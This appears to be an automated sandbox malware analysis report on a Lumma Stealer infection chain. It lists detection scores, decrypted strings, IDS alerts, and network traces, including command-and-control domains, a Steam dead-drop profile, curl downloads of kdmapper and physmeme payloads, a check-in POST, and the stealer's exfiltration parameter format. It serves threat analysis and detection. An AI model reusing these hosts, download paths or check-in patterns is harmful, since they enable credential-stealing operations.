                                Source: C:\Edge\msedge.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Local\Idle.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\AwpzIjFt.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\CQuHWLcS.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\LUAEjdyP.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\NohnZlpE.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\PDYwKARr.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\WjFdZuSe.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\YtKLaCEq.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\iZOTduyR.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\iyHbCGSC.logReversingLabs: Detection: 25%
                                Source: C:\Users\user\Desktop\onyQOgMn.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\pGvBroyE.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\tGwZoaKl.logReversingLabs: Detection: 29%
                                Source: C:\Windows\Speech\kdmapper.exeReversingLabs: Detection: 68%
                                Source: C:\Windows\Speech\physmeme.exeReversingLabs: Detection: 60%
                                Source: NCTSgL4t0B.exeReversingLabs: Detection: 52%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Users\user\Desktop\BlhoAAti.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Idle.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\LUAEjdyP.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\MsCvKimq.logJoe Sandbox ML: detected
                                Source: C:\Edge\msedge.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\PDYwKARr.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\NDQNJGxB.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\CQuHWLcS.logJoe Sandbox ML: detected
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: strappystyio.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: coursedonnyre.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fossillargeiw.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tendencerangej.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appleboltelwk.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tearrybyiwo.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: captainynfanw.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: surveriysiop.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tiddymarktwo.shop
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 1AsNN2--5899070203
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.7:49706 version: TLS 1.2
                                Source: NCTSgL4t0B.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000000.1306786234.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.10.dr
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1323956983.000001EBAEA64000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: NCTSgL4t0B.exe
                                Source: Binary string: ;C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: NCTSgL4t0B.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1324416558.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1323956983.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1324507313.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325126698.000001EBAEA20000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.14.dr

                                Spreading

                                barindex
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEBAEC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF735DEBAEC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,12_2_00DEA69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,12_2_00DFC220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E0B348 FindFirstFileExA,12_2_00E0B348
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.ini

                                Software Vulnerabilities

                                barindex
                                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]19_2_0040F7B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]19_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]19_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]19_2_00414031
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]19_2_0042D150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx19_2_0043F150
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax19_2_00407170
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]19_2_00441100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h19_2_0044A1E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h19_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax19_2_0041F193
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h19_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax19_2_00416361
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h19_2_0044A360
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0042D3CC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_004473FA
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]19_2_00424390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]19_2_004283A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]19_2_004303B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]19_2_0043F479
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]19_2_0042F40F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_00443420
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah19_2_0044A4D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp19_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebp19_2_0040A4E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]19_2_0042B490
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0044A5E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]19_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]19_2_004206E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh19_2_00443870
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h19_2_0043F8C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]19_2_0043A880
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_0044A8B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]19_2_004468B9
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]19_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h19_2_00426910
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh19_2_004449F0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]19_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, ecx19_2_0041399C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_004499B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [edi]19_2_0043EA30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h19_2_00415ADF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h19_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx19_2_0041DAA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]19_2_0040DAB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00426B80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh19_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh19_2_0042BC50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx19_2_00449C10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]19_2_00413CC6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]19_2_00412653
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]19_2_0042CCDD
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [edi+eax]19_2_0042CCF5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_00428C90
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]19_2_00404CB0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]19_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]19_2_0042ED6D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]19_2_00405D10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, 0000000Bh19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al19_2_00431E00
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]19_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh19_2_00447E30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h19_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax19_2_00415EF6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h19_2_0041AF50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]19_2_00410F0F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]19_2_0042DFD6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh19_2_00443FA0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.7:50403 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.7:60759 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.7:49694 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:51720 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.7:58850 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.7:54636 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.7:65440 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.7:64024 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.7:51956 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49706 -> 172.67.197.40:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49706 -> 172.67.197.40:443
                                Source: Malware configuration extractorURLs: tendencerangej.shop
                                Source: Malware configuration extractorURLs: surveriysiop.shop
                                Source: Malware configuration extractorURLs: captainynfanw.shop
                                Source: Malware configuration extractorURLs: coursedonnyre.shop
                                Source: Malware configuration extractorURLs: tearrybyiwo.shop
                                Source: Malware configuration extractorURLs: appleboltelwk.shop
                                Source: Malware configuration extractorURLs: fossillargeiw.shop
                                Source: Malware configuration extractorURLs: strappystyio.shop
                                Source: Malware configuration extractorURLs: tiddymarktwo.shop
                                Source: unknownDNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: zelensky.top replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
                                Source: unknownDNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ww.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: file.garden
                                Source: global trafficDNS traffic detected: DNS query: tiddymarktwo.shop
                                Source: global trafficDNS traffic detected: DNS query: surveriysiop.shop
                                Source: global trafficDNS traffic detected: DNS query: captainynfanw.shop
                                Source: global trafficDNS traffic detected: DNS query: tearrybyiwo.shop
                                Source: global trafficDNS traffic detected: DNS query: appleboltelwk.shop
                                Source: global trafficDNS traffic detected: DNS query: tendencerangej.shop
                                Source: global trafficDNS traffic detected: DNS query: fossillargeiw.shop
                                Source: global trafficDNS traffic detected: DNS query: coursedonnyre.shop
                                Source: global trafficDNS traffic detected: DNS query: strappystyio.shop
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: offeviablwke.site
                                Source: global trafficDNS traffic detected: DNS query: zelensky.top
                                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site
                                Source: RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                                Source: powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                Source: powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                                Source: powershell.exe, 00000024.00000002.1860376856.000001AF6E6B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
